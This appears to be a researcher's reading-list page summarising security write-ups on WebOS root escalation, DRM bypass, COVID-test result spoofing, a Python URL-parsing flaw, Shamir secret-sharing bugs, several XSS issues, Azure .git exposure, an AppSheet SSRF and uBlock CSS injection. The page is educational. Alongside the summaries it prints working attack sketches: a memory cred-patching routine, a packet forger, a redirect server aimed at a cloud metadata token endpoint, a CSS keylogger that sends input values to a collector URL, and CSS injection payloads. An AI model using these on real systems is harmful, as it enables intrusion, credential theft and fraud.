Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

V8 Heap pwn and /dev/memes - WebOS Root LPE- 727

David Buchanan    Reference → Posted 4 Years Ago
  • WebOS is the operating system used by LG TVs, so finding vulnerabilities in it may allow for the compromise of a TV. LG TVs include a built-in developer mode that allows users to sideload applications into a chroot jail reachable over SSH. The applications can either contain native code or be HTML/JS based.
  • V8 is the JavaScript and WebAssembly engine used in Chrome and other modern browsers. Since WebOS is heavily based upon Chromium, attacking V8 is a good vector. Long before this article was written, the author had noticed the heavy usage of snapshot blobs, which allow a previously created V8 context to be loaded dynamically to save time. So, what if we modified one at application load?
  • It turns out that V8 assumes that snapshots are benign! If you modify anything on the V8 heap, such as the length of some buffer, V8 trusts it. Using this primitive, we can trivially compromise the WebOS renderer to escalate our privileges from inside the chroot jail.
  • The author spends some time on V8 exploitation from a CTF challenge that featured the same exact vulnerability: the overall exploit strategy and getting RWX memory in a JITed function. In short, the author corrupts the snapshot to build easy addrof() and fakeobj() primitives, then uses them to execute shellcode. To me, the interesting part was finding the bug in the first place.
  • With code execution in the context of WebOS's browser engine, we are looking good. However, this code does not run as root, so it is time for another LPE. In WebOS, /dev/mem is world writable! This gives us direct access to the physical address space, which is the keys to the castle.
  • To actually exploit this, the author did a linear search of RAM for the struct cred of their process. Once they found it, they elevated it to root by writing to /dev/mem directly. Another trick was finding which physical address ranges to search by reading the contents of iomem_resource. Using this, they could locate the proper task information, eventually modifying the creds associated with their process.
  • Overall, this is an interesting article that took a small oversight in the usage of snapshots and turned it into a privilege escalation. Good work!
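The cred search and patch described above can be sketched roughly like this. It is a minimal sketch operating on a memory dump buffer rather than /dev/mem itself, and it assumes (hypothetically) that the eight ID fields of struct cred (uid, gid, suid, sgid, euid, egid, fsuid, fsgid) sit as consecutive little-endian u32 values and that uid == gid:

```python
import struct

def find_cred_offsets(mem: bytes, uid: int) -> list[int]:
    """Return offsets where eight consecutive u32 values all equal uid.

    Assumed layout: the eight ID fields of struct cred stored back to back,
    little-endian, with uid == gid (common for a single unprivileged user).
    """
    needle = struct.pack("<8I", *([uid] * 8))
    hits, start = [], 0
    while (off := mem.find(needle, start)) != -1:
        hits.append(off)
        start = off + 4  # keep scanning past this hit
    return hits

def patch_cred(mem: bytearray, offset: int) -> None:
    """Overwrite all eight ID fields with 0 (root)."""
    mem[offset:offset + 32] = struct.pack("<8I", *([0] * 8))
```

Against the real target, the same scan would read from /dev/mem directly, using the System RAM ranges from iomem_resource (visible in /proc/iomem) to know where to look.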

Bypassing early 2000s copy protection for software preservation- 726

Paavo Huhtala    Reference → Posted 4 Years Ago
  • There was a Swedish children's video game series called Mulle Meck. The series released five games, but most of the CDs are gone, since this was in the late 90s. Luckily, the games are preserved on archive.org.
  • There is a problem with one of the games in the series though: DRM. Mounting the disc image does absolutely nothing. Time to break DRM with modern technology!
  • The disc does not mount because of a copy protection known as SafeDisc 2, which was very common for the era. This DRM is easily identified by a magic string inside the main binary. The DRM itself is loaded via a driver, which was known to be riddled with security vulnerabilities.
  • The SafeDisc signature is within setup.exe, which boots the game. So, the author had an idea: "If SafeDisc is used on the installer, why don't we just install it ourselves?"
  • By extracting the game from the CD directly and mimicking the installation process, the game could be loaded without any DRM but comes with a weird error message: The program is not installed correctly. Please run the installer again. This required some digging.
  • The author took out Ghidra but got lost in the sauce. The executable was not just a game: it was the Adobe Shockwave player (Macromedia Projector) with the game data simply appended to the end of the file. Instead of going down the Shockwave-altering route, they decided to use another tool: Procmon.
  • Procmon logs file, registry, and process activity for the monitored application. After clicking through the tool for a while, they noticed an access to the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\MulleHus.exe. If this key was not found, the application would crash, since it thought the game was not properly installed.
  • The final DRM check, also found via Procmon, verified that specific files existed on the system. If they did not, the game refused to run, assuming a bad installation.
  • Most DRM bypasses are about modifying the actual game or breaking cryptography. In this case, the DRM was simply side-stepped by recreating the expected files and registry key and skipping the installer.
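The identification step above boils down to a signature scan over the binary. A minimal sketch, where the marker b"BoG_" is the commonly reported prefix of the SafeDisc signature (treat the exact bytes as an assumption, not a value taken from the article):

```python
# Commonly reported SafeDisc signature prefix; an assumption here, not
# an authoritative value from the write-up.
SAFEDISC_MARKER = b"BoG_"

def uses_safedisc(exe_bytes: bytes) -> bool:
    """Return True if the executable contains the SafeDisc marker."""
    return SAFEDISC_MARKER in exe_bytes
```

In practice you would run this over setup.exe (or whichever binary launches the game) after reading it in binary mode.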

Faking A Positive COVID Test- 725

Ken Gannon - F-Secure    Reference → Posted 4 Years Ago
  • At-home COVID tests are becoming more and more common and, as with everything in the modern world, computer technology is being added to them. The Ellume COVID-19 Home Test was looked at in this case.
  • The analyzer was a custom board paired with a standard lateral flow test; the board determined whether the user was COVID positive or negative and reported the result to the companion mobile app.
  • The Android application had an un-exported activity which, on a rooted device, can be interacted with. This activity appeared to be for debugging the application from the developer side, and studying it taught the author a great deal about the Bluetooth communication.
  • There were two types of messages: STATUS and MEASUREMENT_CONTROL_DATA. Further reverse engineering revealed the fields in each packet: the MEASUREMENT_CONTROL_DATA packet held line information, a test ID, a checksum, a CRC and many other values.
  • The STATUS packet had the status of the test (positive or negative), measurement count and some other information. This was found by looking at the classes in the decompiled Android application.
  • How does somebody go about attacking this, though? Currently, the US government allows Ellume to administer COVID tests for events. Once the test has been taken, the phone application on the user's device is used to demonstrate the result of the test.
  • At this point, a malicious user could use Frida to hijack the flow of the application and alter the data returned from the test. Once the data has been changed and the CRC rewritten, a certificate with the fake information comes out.
  • To me, this flow is fundamentally flawed. If an attacker can store this information on their phone, what stops them from running a completely altered version of the application, or even their own phone app? In my opinion, the test should connect to a test administrator's phone instead of the user's.
  • To fix this problem, the authors recommended that Ellume implement further analysis to ensure that data spoofing is not possible, along with obfuscation and OS checks in the Android app. However, these are not true protections: they only slow attackers down. A redesign of the workflow would be required to truly fix this.
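The "change the data, then rewrite the CRC" step can be sketched like this. It is a minimal sketch using a hypothetical packet layout (payload followed by a 4-byte little-endian CRC-32); the real Ellume packet format and CRC variant are not specified here, so both are assumptions:

```python
import zlib

# Hypothetical layout: payload bytes followed by a 4-byte little-endian
# CRC-32. Only illustrates the tamper-and-recompute step, not the real
# Ellume protocol.
RESULT_OFFSET = 0  # assumed position of the result byte (1 = positive)

def forge_result(packet: bytes, result: int) -> bytes:
    payload = bytearray(packet[:-4])         # strip the old checksum
    payload[RESULT_OFFSET] = result          # overwrite the test result
    crc = zlib.crc32(bytes(payload))         # recompute the checksum
    return bytes(payload) + crc.to_bytes(4, "little")
```

In the actual attack this rewrite happened inside the app's data flow via Frida hooks rather than on raw packets.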

How I found (and fixed) a vulnerability in Python- 724

Adam Goldschmidt    Reference → Posted 4 Years Ago
  • Many attack vectors focus on differences in interpretation: either between the verifier and the user, or between different points in a chain handling the same data. Recent examples include HTTP request smuggling and web cache poisoning.
  • The author of this article was looking for such parsing discrepancies and decided to focus on Flask, Bottle and Tornado, which are popular Python web frameworks.
  • The author noted that the URL parsing of these libraries differed. After discussing with members of the open source community, they were led to the standard Python library: in particular, urlparse.
  • Python's query-string parsing treats semicolons as separators, while most modern proxies only treat ampersands as separators. Practically, an attacker could separate query parameters using a semicolon (;) so that one server sees multiple query parameters while the other sees one fewer.
  • For instance, for the query ?link=http://google.com&utm_content=1;link='>alert(1), Python would see 3 query parameters: link, utm_content and link. However, a modern proxy would only see link and utm_content. Neat! Cache desyncing!
  • The author created a pull request against CPython. This led to a change in Python 3.9 so that the semicolon (;) is no longer treated as a separator. The original W3C recommendation for URLs allowed semicolons as separators, but more recent recommendations only allow the ampersand.
  • Overall, fairly good article but I wish more details were given. Issues between steps like this one are not going away any time soon!
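The discrepancy can be demonstrated with two toy parsers: the "proxy" splits only on ampersands (modern behavior), while the "backend" splits on both, as pre-fix Python did. A sketch:

```python
import re

def parse_qs_keys(query: str, seps: str) -> list[str]:
    """Return parameter names, splitting on the given separator chars."""
    return [pair.split("=", 1)[0]
            for pair in re.split(f"[{seps}]", query) if pair]

query = "link=http://google.com&utm_content=1;link=evil"
proxy_keys = parse_qs_keys(query, "&")     # modern proxies: '&' only
backend_keys = parse_qs_keys(query, "&;")  # old Python parse_qs: '&' and ';'
```

The proxy caches the response keyed on two parameters, while the backend acted on three; that mismatch is the cache-desync primitive.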

Shamir’s Secret Sharing Vulnerabilities- 723

Filipe Casal & Jim Miller - Trail of Bits    Reference → Posted 4 Years Ago
  • A threshold signature scheme is a protocol that allows a group of users to generate and control a private signing key. Using it, the users can jointly sign data, but no individual can sign alone.
  • Secret sharing is a protocol for splitting a secret key into shares, which can be combined to recreate the key. A common technique for this is Shamir's Secret Sharing. The high-level idea behind Shamir's scheme is that for n users, you want at least t of them (where t <= n) to be able to recover the secret by combining their shares.
  • To make this work, a polynomial p of degree t-1 (so t shares are necessary to recover the secret) is constructed over a finite field. The shares are created by evaluating the polynomial at n different points, one for each user. The key property is that a single point reveals no information about the polynomial.
  • Since the secret value is encoded in the polynomial, recovering the polynomial recovers the secret.
  • Since the constant term of the polynomial is the secret value, it is essential that the x-value of each share is non-zero; otherwise, the secret is exposed. Many of the libraries did not stop this from happening, so the secret could be leaked to one of the shareholders!
  • Many of the implementations let each user supply a unique ID value that selects the evaluation point. Additionally, arithmetic over a finite field is done modulo the order of the field, which means that even if 0 was not allowed, a wrap-around value could be used to reach the zero point and recover the key.
  • The second bug was a division by zero. People forget that recombining shares involves modular division as well; the library authors forgot to check for the 0 case, leading to crashes.
  • The authors noted that these schemes have very few implementation standards. As a result, they created ZKDocs to help developers implement non-standardized cryptographic primitives.
  • Overall, this was an interesting attack that uses basic math to break implementations. I particularly appreciated the modular wrap-around attack.
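Both the x = 0 leak and the wrap-around variant can be shown with a toy share function; a sketch over a prime field (the prime and coefficients here are arbitrary illustration values):

```python
# Toy Shamir share evaluation over GF(P). The secret is the constant
# term, so evaluating at x = 0 -- or any x that is 0 mod P -- hands a
# shareholder the secret directly.
P = 2**127 - 1  # a Mersenne prime; real libraries use other fields

def eval_poly(secret: int, coeffs: list[int], x: int) -> int:
    """Evaluate p(x) = secret + c1*x + c2*x^2 + ... mod P (Horner)."""
    acc = 0
    for c in reversed(coeffs):
        acc = (acc + c) * x % P
    return (acc + secret) % P
```

A safe implementation must reject any share ID x with x mod P == 0, not just the literal value 0.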

Rocket.Chat Client-side Remote Code Execution- 714

SSD    Reference → Posted 4 Years Ago
  • Rocket.Chat is an open source alternative to Slack: a team-based messaging service with many collaboration tools built in. It also ships a desktop application built on Electron.
  • The desktop application allows same-host navigation, meaning any link to the same host will be opened in the desktop application itself. By itself, this is not a problem. But what if we can get something we control to be opened in Electron?
  • Rocket Chat allows users to open files to locations such as S3, GCloud and other places. By using the URI redirect that goes to an uploaded file with JavaScript, the code will be executed within the application!
  • Since the line between client-side JavaScript and desktop programming is quite blurred with Electron, this XSS gives access to the host! Using this, files, passwords or whatever the attacker wants could be stolen from the desktop application.
  • Electron apps are hard to lock down. Developers need to be careful with XSS and redirects specifically.

Proctorio Chrome extension Universal Cross-Site Scripting- 713

Sector 7    Reference → Posted 4 Years Ago
  • With the rise of online schooling, teachers needed to ensure students could not cheat during tests. One way to prevent cheating is the Proctorio Chrome extension, which can view internet traffic, alter pages and many other things.
  • The extension inspects web traffic of the browser. Depending on the paths that are configured via the administrator, it will inject content into the scripts of the page. Once a test has started, a toolbar is added with a number of buttons, such as a calculator.
  • When the = button is pressed, the computation is performed via the JavaScript eval() function. Since the input is never validated to be a mathematical expression, we have XSS within the context of the Chrome extension.
  • XSS is a serious vulnerability to begin with; in the context of a browser extension that can be triggered on any page, it turns into universal cross-site scripting. By sending a URL that matches the extension's demo mode, the calculator can be invoked on an attacker-controlled page to get XSS in the extension.
  • The extension's content script does not have the full permissions of the extension, but major damage can still be done. Using the XSS, a request can be made that bypasses the same-origin policy to return arbitrary data. For instance, an attacker could steal emails from an inbox or anything else on any website the victim visits. Damn, that is a real bad bug!
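The calculator bug boils down to passing user input straight to eval(). A sketch of the flaw and an allowlist fix, written in Python rather than the extension's JavaScript:

```python
import re

def unsafe_calc(expr: str):
    # Mirrors the Proctorio bug: arbitrary code runs if expr is not math.
    return eval(expr)

# Allowlist fix: accept only digits, arithmetic operators, parens, spaces.
ALLOWED = re.compile(r"[0-9+\-*/(). ]+")

def safe_calc(expr: str) -> float:
    if not ALLOWED.fullmatch(expr):
        raise ValueError("not a mathematical expression")
    # Evaluate with builtins stripped as defense in depth.
    return eval(expr, {"__builtins__": {}}, {})
```

As the takeaway in the write-up suggests, the allowlist approach (validate, then evaluate) is far safer than trying to deny known-bad strings.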

NotLegit: Azure App Service vulnerability exposed hundreds of source code repositories- 712

Shir Tamari - Wiz.io    Reference → Posted 4 Years Ago
  • Azure App Service is a cloud computing platform for hosting websites and web applications. The service is meant to make deploying code quick and easy; the code can be pulled via SSH, GitHub or other sources.
  • A classic website misconfiguration is accidentally serving sensitive files from the web root of the server. Included in this category of sensitive files is the .git folder.
  • The .git folder holds all of the information about a Git repository, from the first commit to the most recent. By gaining access to this directory, it is possible to recover the entire source code of the application!
  • Source code may have hardcoded passwords, important intellectual property and many other sensitive pieces of information. Being able to steal the source code is a terrible vulnerability.
  • The solution Azure App Service implemented was a rule in web.config. Since web.config is only honored by IIS, which serves the C# applications, the mitigation only worked for C# deployments. As a result, deployments for PHP, Ruby, Python and Node served by Apache, Nginx and similar stacks remained vulnerable.
  • This vulnerability is incredibly simple, and I am astonished it went unnoticed for 4 years (since 2017). As an attacker, I would rather be lucky than good!
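Checking a deployment for this exposure is straightforward: request /.git/HEAD and see whether a plausible Git HEAD file comes back. A sketch of the classification step (the HTTP request itself is omitted; any client works):

```python
def looks_like_git_head(body: str) -> bool:
    """A served .git/HEAD is either a ref pointer or a raw commit hash."""
    body = body.strip()
    if body.startswith("ref: refs/"):
        return True  # e.g. "ref: refs/heads/master"
    # Detached HEAD: a bare 40-character hex SHA-1.
    return len(body) == 40 and all(c in "0123456789abcdef" for c in body)
```

From a confirmed /.git/HEAD, existing tooling can walk the object database and reconstruct the full source tree.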

SSRF vulnerability in AppSheet - Google VRP - 711

David Nechuta    Reference → Posted 4 Years Ago
  • Google AppSheet is a no-code app generator. While exploring its functionality, the author found a section called Workflows, which makes it possible to automate app behavior via rules. One of the options is a webhook.
  • Since these hooks required a URL, the author pointed one at an internal URL to try to steal the instance's metadata, which would include keys for the box. However, they ran into a problem: they needed to make a GET request, while the application only supported POST/PUT requests.
  • To get around this, they made the request to a separate website that they controlled and responded with a 301 redirect to the internal URL, which also caused the request method to change to GET. Amazingly enough, this worked for getting back the access token!
  • It turns out that the API would accept a POST or GET request, which made the shenanigans above not necessary. Try the stupid simple thing first!
  • The fix was to disable the legacy metadata API that the author had originally used in their exploit. Additionally, the Metadata-Flavor header, which the metadata request requires, was banned, making the SSRF unexploitable. However, the webhook could still add custom headers, and the author found an alternative header that also triggers the metadata request: X-Google-Metadata-Request.
  • Overall, good read with some neat SSRF tricks!
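The redirect trick amounts to running a tiny attacker-controlled server that answers the webhook's POST with a 301 pointing at the internal metadata URL; most HTTP clients rewrite the method to GET when following a 301 after a POST. A minimal sketch using Python's http.server (the metadata path shown is the commonly used legacy v1beta1 token endpoint, an assumption here, as the write-up does not spell out the exact URL):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Assumed legacy metadata endpoint; the v1beta1 API did not require the
# Metadata-Flavor header, which is what made it attractive for SSRF.
METADATA_URL = ("http://169.254.169.254/computeMetadata/v1beta1/"
                "instance/service-accounts/default/token")

class RedirectToMetadata(BaseHTTPRequestHandler):
    def do_POST(self):
        # The webhook POSTs here; bounce it to the internal endpoint.
        self.send_response(301)
        self.send_header("Location", METADATA_URL)
        self.end_headers()

def make_server(port: int = 8080) -> HTTPServer:
    """Bind the redirect server; call .serve_forever() to run it."""
    return HTTPServer(("127.0.0.1", port), RedirectToMetadata)
```

The webhook follows the redirect, fetches the token as a GET, and hands the response body back to the attacker.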

uBlock, I exfiltrate: exploiting ad blockers with CSS- 710

Gareth Heyes - PortSwigger    Reference → Posted 4 Years Ago
  • uBlock Origin is a popular ad blocker. It works from community-provided filter lists, which use CSS selectors to determine which elements to block. Since these lists are not entirely trusted, they need to be constrained from running arbitrary CSS. So, is there a way around this? That is what this post is all about! Major S/O to Zi on DayZeroSec for explaining and diving deeper into how these filters work.
  • The research all started from a Tavis Ormandy post on CSS injection. The payload looks like this:
    example.com##div:style(--foo: 1/*)
    example.com##div[bar="*/;background-image: url(https://google.com);}/*"]
    
    The key to this is the /*, which opens a CSS comment. By opening the comment in one rule and closing it in another, the CSS selector can be escaped to inject arbitrary CSS.
  • The vulnerability above was patched by adding a check when operating on styles to not allow opening or closing comments. To bypass this security check, simply open up a comment NOT in the styles to trigger the same CSS injection bug as before. Blocking the comment was just not enough. The POC is shown below:
    ##input,input/*
    ##input[x="*/{}*{background-color:red;}"]
    
  • The fix for this was global in scale instead of denylisting a few more characters. Rather than trying to detect bad selectors in code, they now use an actual style sheet to validate that the filter cannot inject: if the filter injects into the style sheet, the program catches it. It is awesome to see a global fix to this problem!
  • After this, the author looked at whether the cosmetic filter functionality, which allows for powerful CSS selectors, could be bypassed. The same trick of starting a comment on one line and ending it on another allowed smuggling a payload here as well; it worked because the validation code, based on document.querySelector, accepted invalid syntax. This was fixed by checking the rules for opening and closing comments.
  • At this point, the obvious attack vectors were gone, with the comment tricks running out of life. Gareth Heyes decided to fuzz what was and was not allowed in CSS. He noticed that a CSS selector can also use curly braces to add functionality inside of it, and that if there is no closing curly brace for the selector, a semicolon will NOT start a new rule. Instead, TWO selectors would be added to the sheet, smuggling one in.
  • The reason this is possible is better explained in the DayZeroSec episode mentioned above. The vulnerable code path only checked that a non-zero number of selectors was added, which leaves a lot of wiggle room: when something is smuggled in, more than one selector (such as two) can be added.
  • The patch prevents any smuggled selectors from being used by checking that the number of added selectors is exactly one. Failing closed as opposed to failing open makes a big difference in security-sensitive operations such as this one! The POC for this exploit is shown below (notice the missing curly brace):
    *#$#* {background:url(/abc);x{  background-color: red;}
    
  • The final bypasses were browser-specific. While the powerful url() function was blocked from use in the injected CSS, some browser-specific functions were not; in Chrome, image-set() could be used to exfiltrate data using only CSS.
  • With CSS injection, how do you do anything useful? Obviously you can alter the page for phishing, but can you steal data? Using attribute-based selectors, it is easy to exfiltrate information. The author built a CSS keylogger, which could be used to steal passwords and other sensitive input. They even found a way to steal the first N characters of a value using selectors in Firefox.
  • To top it off, they found a JavaScript URI injection into a list, but the strong CSP used by uBlock Origin made it impossible to exploit. Overall, a few good takeaways:
    • Fix classes of bugs by addressing the root cause of the problem. This was done multiple times by the uBlock Origin team throughout this process.
    • Fuzzing formats can be useful when trying to smuggle in data. Gareth Heyes has done this in a few other cases with great results!
    • Allowlists are much better than denylists! Banning certain functions will lead to somebody finding a new one to use and bad error checks will always be exploited.
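The attribute-selector exfiltration idea can be sketched by generating one CSS rule per candidate character: when the input's value starts with that character, the browser fetches a unique background URL, leaking the keystroke. A sketch (the collector host and field name are hypothetical):

```python
import string

def keylogger_css(field: str, collector: str,
                  alphabet: str = string.ascii_lowercase) -> str:
    """Generate attribute-selector rules that leak the first character of
    an input's value to an attacker-controlled collector URL."""
    rules = []
    for ch in alphabet:
        rules.append(
            f'input[name="{field}"][value^="{ch}"]'
            f'{{background:url({collector}/{ch});}}'
        )
    return "\n".join(rules)
```

A real keylogger extends this to longer and longer value^= prefixes as the victim types; in the filter-list context, url() was blocked, which is why the Chrome-only image-set() variant mattered.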